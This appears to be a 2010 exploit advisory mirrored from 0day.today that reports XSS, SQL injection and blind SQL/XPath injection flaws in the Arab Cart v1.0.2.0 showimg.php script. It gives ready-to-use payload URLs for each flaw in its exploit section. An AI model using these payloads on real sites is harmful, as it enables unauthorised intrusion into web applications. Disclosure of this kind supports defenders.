Arab Cart Version v1.0.2.0 Multiple Vulnerabilities

🗓️ 22 Feb 2010 00:00:00Reported by indoushkaType

zdt🔗 0day.today👁 26 Views

Arab Cart v1.0.2.0 has multiple vulnerabilities including XSS, SQL injection, and Blind SQL/XPath injectio

===================================================
Arab Cart Version v1.0.2.0 Multiple Vulnerabilities
===================================================

| # Script   : Copyright ArabCART Â© .2010    
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti   
|                                                                 
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- XSS
  
http://server/arabCart/showimg.php?id=<img+src=http://server/acrobat.gif+onload=alert(213771818860)>&sid=8207c6aca4d21740c20f51527ccb3f7a
  
 2- SQL injection
  
 http://server/arabCart/showimg.php?id=%00'
  
 3- Blind SQL/XPath injection
  
 http://server/arabCart/showimg.php?id=8+and+31337-31337=0+--+ 



#  0day.today [2018-01-01]  #

22 Feb 2010 00:00Current

7.1High risk

Vulners AI Score7.1